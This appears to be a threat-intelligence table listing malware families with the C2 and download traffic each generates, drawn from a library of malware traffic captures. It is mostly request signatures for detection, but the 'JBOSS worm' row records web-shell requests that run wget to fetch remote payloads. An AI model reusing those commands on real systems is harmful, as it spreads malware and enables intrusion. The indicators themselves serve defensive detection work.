Current malware traffic example listing (see http://www.deependresearch.org/2013/04/library-of-malware-traffic-patterns.html for details and sample pcap downloads).

| Malware / family | Observed request or traffic pattern |
|---|---|
| 9002 ... | 9002.............. |
| 9002POST | POST /2d HTTP/1. 1 |
| Andromeda | POST /new/gate.php HTTP/1.1 |
| APT1_WEBC2_RAVE | GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0 |
| Asprox Checkin | GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35C70A97FF61249661F38426DA71D12B40F9A512B6C945CD85462CD565962B6C5CACB1B09F86B1651EB971F3013D14695028FE0BEBD838B9D3C5DE002EA95371E51B0E8CFB7567F6BF HTTP/1.1 |
| AsproxGET list of C2s | GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 HTTP/1.1 |
| AsproxGETs spam template | GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 HTTP/1.1 |
| Avatar Rootkit | GET /search?query=EZTFDHWP&sort=relevance HTTP/1.1 http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance |
| backdoor ? | GET /18110123/page_32262 308.html HTTP/1.1 |
| Banechant 1 | GET /IGKKT HTTP/1.1 |
| Banechant payload dl 2 | GET /adserv/logo.jpg HTTP/1.1 |
| Beebone downloader | GET /0/?f\|-1813912965Admin GET a/76876332/1 |
| Beebus | GET /windosdate/v6/defau1t.aspx?ln=en-us HTTP/1.1 |
| Beebus C2 checkin | GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1 |
| Beebus C2 checkin | GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1 |
| Beebus data send | POST /s/asp?__uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVwBJAE4ARABPAFcAUwBNAEEAQQBOAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==p=2 HTTP/1.1 |
| Bitcoinminer | POST / HTTP/1.1 Authorization: Basic cXdlcnR5MTIzLjE6eA== |
| Carberp | POST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm |
| Citadel | POST /g.php HTTP/1.1 |
| Citadel (Zbot var) | POST /C270suqdh/file.php HTTP/1.1 |
| Cookies / Cookiebag | GET /1799.asp HTTP/1.1 |
| Cookies / Cookiebag / Dalbot | GET /3961.html HTTP/1.1 Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs= |
| Cookies / Cookiebag / Dalbot | GET /indexs.zip HTTP/1.1 |
| Cookies / Cookiebag / Dalbot | GET /8223.asp HTTP/1.1 |
| Coswid | GET /old/google.png HTTP/1.1 |
| CVE-2012-0754 SWF in DOC | GET /test.mp4 HTTP/1.1 |
| CVE-2012-0779 | GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1 |
| Darkmegi | GET /20111230.jpg HTTP/1.1 |
| Darkness DDoS v8g | GET /index.php?uid=587609&ver=8g%20XP HTTP/1.0 |
| Depyot | GET /new/3d/d/pdf.php?id=2 HTTP/1.1 |
| Destory Rat / Sogu / Thoper | POST /update?id=000f72b8 HTTP/1.1 |
| Destory Rat / Sogu / Thoper | POST /update?id=3109c2a2 HTTP/1.1 |
| Destory Rat / Sogu / Thoper | POST /update?product=windows HTTP/1.1 |
| Destory Rat / Sogu / Thoper (reported as PlugX RAT ver) | POST /update?id=000f6b50 HTTP/1.1 |
| DirtJumper DDoS | POST /678/index.php |
| DirtJumper DDoS | POST /boi854tr4w.php HTTP/1.0 |
| Disttrack | GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0 |
| DNSChanger | POST /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== HTTP/1.1 |
| DNSwatch / Protux | GET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.1 |
| Downloader BMP | GET /images/evil.bmp HTTP/1.1 |
| Einstein | GET / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs HTTP/1.1 |
| Einstein data send | POST / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK HTTP/1.1 |
| EK - Blackhole 2 landing | GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o&xguc=3b:3i:39:35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd HTTP/1.1 |
| EK Blackhole 1 | GET /showthread.php?t=d7ad916d1c0396ff HTTP/1.1 |
| EK Phoenix | GET /navigator/jueoaritjuir.php HTTP/1.1 |
| Enfal / Lurid | GET /oi2c/wlc3/ [redacted]:00-00-00-00-00-00/ij83d HTTP/1.1 |
| Enfal / Lurid | GET /trandocs/nm/.[redacted] :00-00-00-00-00-00lCrrrwhite HTTP/1.1 |
| Enfal / Lurid | POST /cgi-bin/CMS_SubitAll.cgi HTTP/1.1 |
| Enfal / Lurid | POST /cgl-bin/Owpq4.cgi HTTP/1.1 |
| Enfal / Lurid | POST /Sjwpc/odw3ux HTTP/1.1 |
| FakeAV var (via Kuluoz - Asprox botnet) | GET /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /search?qu= HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1 |
| Favorites / Orsam / Apptom | POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1 |
| Favorites / Orsam / Apptom | POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1 |
| Flashback OSX | GET /statistics.html HTTP/1.1 |
| Foxy | POST /404error.asp HTTP/1.1 |
| Foxy Checkin | GET /images/leftnav_prog_bg.jpg HTTP/1.1 |
| Gapz C&C request | POST / HTTP/1.0 Host: hvqnut3kurg3lku.strangled.net |
| Gh0st | GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1 |
| Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 |
| Gh0st ASP ver | GET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.O.69 HTTP/1.1 |
| Gh0st PHP ver | GET /ld/queenfun/vl /login.php?cd2hpdGU&uU11TVEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l |
| Gh0st v2000 var | v2010........f...............( ......Service Pack 2..?..|...|...|0.@.. |
| Gh0st var | GET /h.gif?pid=113&v=130586214568 HTTP/1.1 |
| Glasses | GET /ewpindex.htm HTTP/1.1 |
| GoogleAdC2 | GET /html/lost.html HTTP/1.1 |
| GoogleAdC2 2nd stage | GET /Trojan2.jpg HTTP/1.1 |
| Googles | GET /sll/monica.jpg HTTP/1.1 |
| Greencat | GET / |
| Gtalk | GET /facebook.png HTTP/1.1 |
| Guntior - CN bootkit | GET /yx/tongji.html HTTP/1.1 |
| Gypthoy | POST /opt/mainpage.php HTTP/1.1 |
| Hiloti | GET /get2.php?c=DMRACJEP&d=26606B67393C36322E64636F317E3E3D2120222124243078747D456E7579232910121A14141047015D404E166D1D1B1676740101060203760C787F0C05787D0801007573067C7F770A7E7B0F6A2F27212634206E656D657130303E666A6A6F6A55565A024204020A55584C041F1B0B1D4D442D42522A02141344574A4B4C4E4AB4B5B7B1BDA3F6F5E7EAB7CEF4FDE2E0E2F4E0BDD1CDD3B1F4FDABC4F9A0AFB9C3CDCCD7FBC09B978EDE9C9F919D88C98D8094C1898490D4D6DDD6869AD4DADEB4A4FFF2F6FCF0F1FCF8FCFBFCEB8B8082 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) |
| HOIC DDoS | GET / HTTP/1.0 |
| Horst Proxy | GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1 |
| icon.js - system info send | GET /1js/handle.php?addr=http%3A//thaingo.org/web/category/daylinews/enqnews/&ck=PHPSESSID%3Dn3fj1rfatdpgvpp7lucn0g44c5%3B%20_utma%3D202272852.2144388183.1340808890.1340808890.1340877171.2%3B%20_utmb%3D202272852.2.10.1340877171%3B%20_utmc%3D202272852%3B%20_utmz%3D202272852.1340808890.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29&soft=Windows%20Explorer&browser=Mozilla/4.0%20(compatible;%20MSIE%208.0;%20windows%20NT%205.1;%20Trident/4.0;%20.NET%20CLR%202.0.50727;%20.NET%20CLR%203.0.04506.648;%20.NET%20CLR%203.5.21022;%20.NET%20CLR%203.0.4506.2152;%20.NET%20CLR%203.5.30729;%20.NET4.0c;%20.NET4.0E)&flashver=WIN%206%2c0%2c88%2c0 HTTP/1.1 |
| IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT | POST /index000000001.asp HTTP/1.1 |
| Imaut | GET /setting.doc HTTP/1.1 |
| IRCbot | GET /check_ver.php?version=1.09 HTTP/1.1 |
| IXESHE | GET /AWS26329.jsp?UrFvwIJIOKTRyfxR9KNRqhg8lcPr/CGjUwP8yJUs7RjH7OinJ/85cgrqiP8jKGjpqgb/wTrO7OIjhxoHcGaFaURqK/aHophHLd23K=NHk=a9oQhvDQaLky8qo/RnJz42A HTTP/1.1 |
| IXESHE | GET /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9jOKyjnxKjQJA HTTP/1.1 x_bigfix_client_string: baQMyZrdqDAA |
| IXESHE AES | GET /AES210001129016878.jsp?UrFwUIO3h7ofgwQInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=+LLQhpkZ9LOhGbgqvJghHci7M HTTP/1.1 |
| JBOSS worm | GET /zecmd/zecmd.jsp?comment=perl+lindb.pl HTTP/1.0 GET /idssvc/idssvc.jsp?comment=wget+http://webstats.dyndns.info/javadd.tar.gz HTTP/1.0 GET /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz HTTP/1.0 |
| Karagany Loader | GET /user/go.php?html=do HTTP/1.1 |
| KoreanBanker DL | GET /web/down/kbs.exe HTTP/1.1 |
| Kuluoz.B downloader | |
| Letsgo / TabMsgSQL | GET /indexbak.asp?rands=IXLCGIXELZ&acc=&str=select%20id%20from%20tab_online%20where%20regcode%20=%20'IXLCGIXELZ' HTTP/1.1 |
| Letsgo / TabMsgSQL | GET /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str=select%20top%201%20%20from%20tab_message%20where%20toid%20=%20'198'%20order%20by%20id%20asc HTTP/1.1 |
| Letsgo / TabMsgSQL | GET /safe/1.asp?rands=XJOTLVALQF&acc=vy&str=insert%20into%20tab_online%20(mode,clientname,clientip,accessip,onlinetime,lasttime,regcode)%20values%20('0','victim','192.168.1.12','145.42.112.19','2011-06-08%2013:45:54','2011-06-08%2013:45:54','NMQVPTXFBH') HTTP/1.1 |
| Letsgo / TabMsgSQL downloader | GET /new/iistart.html HTTP/1.1 |
| Likseput | GET /index.html HTTP/1.1 |
| Lingbo(?) | POST /windowsupdatev7/search%3Fhl%3cWABQAFMAUAAzACOAUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AM >QAxADYA%26meta%3DMDAwMGhIÆÑuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1 |
| Luckycat - WIMMIE | POST /count/count.php?m=c&n=[HOSTNAME]_ |
| LURK | LURK0........x.kf.e.apgpbpa0c..#........ |
| Medfos | GET /js/disable.js?type=live&ua=MSIE&u=BgCRABQAMFX_DQEGCJgQAAAAAAAAJA0CFAsAAAD0krxq4hGde6y4c4Imb5lvKDQlUc-Vd0TCuBSswSxzsiKLdPIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPgAAAB4AAAA0VgAA HTTP/1.1 |
| Mefos | GET /uploading/id=1888546865&u=4WWbvjA+sJYdYzrNmxr7vmGjfIZ4mztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM4RqxalcusDRHEOWDjvdOj3ww== HTTP/1.1 |
| MiniASP | GET /device_ |
| MiniASP | GET /record.asp?device_t= |
| Miniduke | POST /index.php HTTP/1.1 |
| Miniflame | POST /cgi-bin/feed.cgi HTTP/1.1 |
| Mirage | POST http:(C&C):443/result?hl=en&meta=mdlyorvkildpiicqqownoatgvow HTTP/1.1 |
| Mirage - later var | GET http://(removed ip)/search ?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg |
| Money loader | GET /get_xml?file_id=25227372 HTTP/1.1 GET /dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 HTTP/1.1 |
| Mongal | GET /3010850A0000F0FD0F00323137443744324536313634333833380044454C4C58540000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000007014C61757261000000000000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1 |
| MSWab / Yayih | POST /bbs/info.asp HTTP/1.1 |
| Murcy | GET /150828 HTTP/1.0 |
| Netravler | GET /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT HTTP/1.1 |
| Netravler | GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::[...]-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1 |
| Netravler | GET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQaCicYTaZR6RDKbDYWCpKKBhM88YjIajKXLfKOEmQ0nIxm86m46D0YVg::end HTTP/1.1 |
| Neutrino EK var | POST /cxiqocvbqd HTTP/1.1 |
| NfLog | POST /IElog/TestURL.asp HTTP/1.0 |
| NfLog | POST /NfLog/Nfile.asp HTTP/1.1 |
| NTESSESS | GET /6K8gL8.html HTTP/1.1 |
| PassAlert | GET /loader/bin/file1.exe HTTP/1.1 |
| Pitty Tiger | GET /FC001/Remote%20PC-769f HTTP/1.1 |
| PNG trojan | GET /index.htm HTTP/1.1 |
| Poison Ivy | 256 bytes of seemingly random data after a successful TCP handshake, then 48 byte "keep-alive" requests |
| Pony loader | POST /ponyb/gate.php HTTP/1.0 |
| PowerLoader | POST /postnuke/blog.php HTTP/1.1 |
| Protux | GET /news.jpg HTTP/1.1 |
| Protux | POST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.1 |
| Quarian | CONNECT sureshreddy1.dns05.com:443 HTTP/1.0 |
| Ranbyus / Triton (Spy, Banking, smart cards) | POST /releases/index.php HTTP/1.1 |
| RedOctober AuthInfo | POST http://%s:%s%s HTTP/1.0 |
| RedOctober Sysinfo | POST http://%CnC%/cgi-bin/nt/sk HTTP/1.1 |
| Reedum | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] |
| RegSubDat | POST /5501000000/log HTTP/1.1 |
| RssFeeder (moved from TBD tab, common name still unknown) 2nd stage | POST /orange/news.php HTTP/1.1 |
| RssFeeder (moved from TBD tab, common name still unknown) initial GET | GET /data/rss HTTP/1.1 |
| Sanny / Win32.Daws | POST /write.php HTTP/1.1 |
| Seasalt | GET /postinfo.html HTTP/1.1 |
| Sofacy | POST /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 HTTP/1.1 |
| Srizbi | GET /cb_4.exe HTTP/1.1 |
| Stabuniq | POST /rssnews.php HTTP/1.1 |
| Swami | POST /im/linux.php HTTP/1.1 |
| Sykipot | GET /kys_allowget.asp?namegetkys.kys HTTP/1.1 |
| Taidoor | GET /apzsr.php?id=021793111D309GE67E HTTP/1.1 |
| Tarsip Eclipse | GET /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 HTTP/1.1 |
| Tarsip Moon | GET /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif=qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 HTTP/1.1 |
| Tbot tor | |
| Tinba aka Zusy | POST /h/index.php HTTP/1.1 |
| Trojan_GameThief | GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4D468A2&os=winxp%20Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 HTTP/1.1 |
| Urausy (Ransomware) | GET /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php HTTP/1.1 |
| Variant Letsgo / TabMsgSQL downloader (comment crew) | GET /index.htm HTTP/1.1 |
| Vinself | POST /w880/T19R17Q16/12010L11014/ HTTP/1.1 |
| Vobfus | GET /XEuPCLrf?e HTTP/1.1 |
| WEBC2-Bolid | GET /firefox.html HTTP/1.1 |
| WEBC2-Clover | GET /Default.asp HTTP/1.1 |
| WEBC2-CSON | GET /Default.aspx?INDEX=<10_random_characters> HTTP/1.1 |
| WEBC2-CSON Response to commands | POST /Default.aspx?ID=IMNQRSSRXK HTTP/1.1 |
| WEBC2-HEAD | GET / HTTP/1.1 |
| WEBC2-Table | GET /order.htm HTTP/1.1 |
| Xpaj | POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1 |
| Xtreme Rat | GET /1234567890.functions HTTP/1.1 |
| Xtreme Rat | GET/1234567890.functions HTTP/1.1 |
| ZeroAccess | GET /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25 HTTP/1.1 |
| ZeroAccess - Counter site checkin | GET /5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=2&digits=10&siteId=31235706 HTTP/1.1 |
| Zeus Gameover | GET /search.php?page=73a07bcb51f4be71 HTTP/1.1 |
| Zeus | POST /orders2010.php HTTP/1.1 POST /busted.php HTTP/1.1 |
| Cutwail / Pushdo | POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe HTTP/1.1 (or xclzve) |
| USteal.D | 220---------- Welcome to Pure-FTPd ---------- |
| Hangover Smackdown Minapro | GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts=[PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 HTTP/1.1 |
| Adware Hotbar | POST /vic.aspx?ver=4.0.1158.0&rnd=595937 HTTP/1.1 |
| ArcomRat / Dokstormac | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] |
| Mutopy Downloader | GET /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4 HTTP/1.1 |
| Symmi Remote File Injector | GET /img/seek.cgi?lin=100&db=dfs HTTP/1.1 GET /ae1.php HTTP/1.1 GET /ggu.php HTTP/1.1 POST /wp-content/gallery/28-juli-sundsore/options.php HTTP/1.1 [wordpress url - varies] |